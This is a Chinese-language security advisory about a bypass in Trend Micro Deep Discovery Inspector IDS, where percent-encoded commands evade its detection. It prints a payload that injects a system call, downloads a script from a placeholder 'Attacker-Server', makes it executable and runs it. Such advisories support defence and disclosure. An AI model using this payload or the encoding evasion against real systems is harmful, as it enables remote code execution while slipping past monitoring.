Trend Micro Deep Discovery Inspector IDS安全繞過漏洞安全通告

發布時間 2019-07-26

漏洞編號和級別


CVE編號:暫無,危險級別:高危,CVSS分值:官方未評定


影響版本


受影響的版本


Trend Micro Deep Discovery Inspector IDS


漏洞概述


Trend Micro Deep Discovery Inspector IDS 是一種網絡設備,可監控所有類型和超過105種不同的網絡協議,以發現進出網絡的高級威脅和有針對性的攻擊。2019年7月24日,研究人員披露了Trend Micro Deep Discovery Inspector IDS 安全繞過漏洞的詳情。安全繞過漏洞源于網絡系統或產品中缺少內容驗證規則或對內容驗證強度不足。


漏洞驗證


經過分析,IDS發現惡意系統命令(如“Wget  Commandline  Injection”)會發出警報,并且將它們標記為高風險。攻擊者將payload與普通的ascii字符一起發送,例如“wget”,即使它們進行了如“\ x77 \ x67 \ x65 \ x74”的編碼,仍會發出警報。但是,攻擊者可以通過在HEX中以百分號字符“%”開頭的惡意命令來輕松繞過這些警報,例如,“%77% 67%65%74”也轉換為“wget”,不僅不會被標記或警告,也可以在目標系統上執行。


Payload:


/index.php?s=/index/vulnerable/app/invoke&function=call_user_func_array&v ars[0]=system&vars[1][]=%77%67%65%74%20http://Attacker-Server/x.sh%20-O% 20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a


修復建議


關注官方網站,及時下載補丁更新。


參考鏈接